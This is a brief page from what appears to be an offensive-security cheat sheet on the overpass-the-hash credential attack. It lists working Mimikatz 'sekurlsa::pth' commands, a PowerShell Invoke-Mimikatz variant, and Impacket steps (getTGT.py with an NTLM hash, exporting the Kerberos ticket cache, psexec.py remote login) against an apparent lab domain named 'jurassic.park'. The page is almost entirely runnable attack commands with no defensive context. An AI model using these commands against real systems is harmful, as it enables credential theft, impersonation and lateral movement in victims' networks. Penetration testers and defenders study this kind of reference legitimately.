Credential Attacks

Overpass the Hash

sekurlsa::pth /user:$User /domain:$domain.domain /ntlm:$hash /run:powershell.exe

Powershell

Invoke-Mimikatz -Command '"sekurlsa::pth /user:$User /domain:$domain.domain /ntlm:$hash /run:powershell.exe"'

On Kali

  • Request the ticket

getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7

  • Export the ticket

export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache

  • Login remotely

psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
PreviousMimikatzNextBloodhound

Last updated